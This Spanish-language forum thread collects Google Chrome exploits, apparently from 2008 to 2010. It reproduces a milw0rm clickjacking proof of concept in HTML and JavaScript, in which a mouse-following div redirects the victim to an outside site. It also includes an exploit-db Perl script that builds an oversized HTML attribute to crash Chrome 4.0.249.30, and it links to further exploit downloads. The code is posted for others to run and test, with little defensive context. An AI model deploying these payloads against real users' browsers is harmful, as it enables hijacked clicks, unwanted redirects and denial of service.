[°] Recopilatorio de Bugs/Exploits en Google Chrome win32

Iniciado por WHK, 3 Septiembre 2008, 00:45 AM

0 Miembros y 1 Visitante están viendo este tema.

THAL

Una vez abierto google chrome cuand busco cualquier tema, me sale este error:
mc7cQ7Hk���S��"�:�n�.����XP

o este:

mc7cQ7Hk���S��"�3�g�'����1N

Alguna sugerencia?

berz3k

@THAL
Que version haz instalado Linux/Win32? , seguramente no se ha instalado correctamente, postearme una screen y los pasos que ejecutas para conocer el bug.

-berz3k.

berz3k


Nuevo Exploit 23.01.2009

Vulnerable Systems:
* Chrome version 1.0.154.43

Google Chrome 1.0.154.43 ClickJacking Vulnerability (2009-01-23)


fuente: http://www.milw0rm.com/exploits/7903


<html>
<style type="text/css">
<!--
.style1 {
font-size: 50px;
font-weight: bold;
}
.style2 {
color: #FF0000;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<body>
<span class="style2">x0x</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location='http://www.cyber-warrior.org/x0x';">This</div>
<p><strong>
  <script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br>
</p>
</html>




MMMMM, a todos les funciona? me parece no se este ejecutando bien

does any1 with more details?


-berz3k.











TheDarkFear

Google Chrome Single Thread Alert Out of Bounds Memory Access Vulnerability

Versión afectada:

Google Chrome 1.0.154.48

Exploit:
http://www.securityfocus.com/data/vulnerabilities/exploits/34130-galrt.zip

No puede hacer poc ya se me habia actualizado a la versión mas reciente.

Fuente:
http://www.securityfocus.com/bid/34130

La informacion es poder y hay que luchar por ese poder.
Twitter: @TheDarkFear

berz3k


Nuevo DoS PoC 2010-01-03

Google Chrome 4.0.249.30 DoS PoC

Fuente:
:http://www.exploit-db.com/exploits/10960

Exploit:



#!/usr/bin/perl
#google chrome 4.0.249.30 DoS PoC
#
#
#Author: Teo Manojlovic
#
#Info: In ordinary cases browser would redirect to "http://www.google.com"
#but in this case browser will report error for something that should
#be possible and is possible on other browsers.
#
#
#
#I would like to thank Jeremy Brown who made very nice fuzzer for browser
#
#
#
#
#
#
#
#Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa


$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";




PoC DoS



Lo he probado en la version 3.0.195.38, no he actualizado posteen link para descargar la version 4.0.249.30 y testear este PoC.


-berz3k.





berz3k

Nuevo Exploit para Chrome, no lo he cofirmado, y algunos mas no los he posteado.

[youtube=425,350]http://www.youtube.com/watch?v=wCzDHqKXq6k&feature=player_embedded[/youtube]

-berz3k.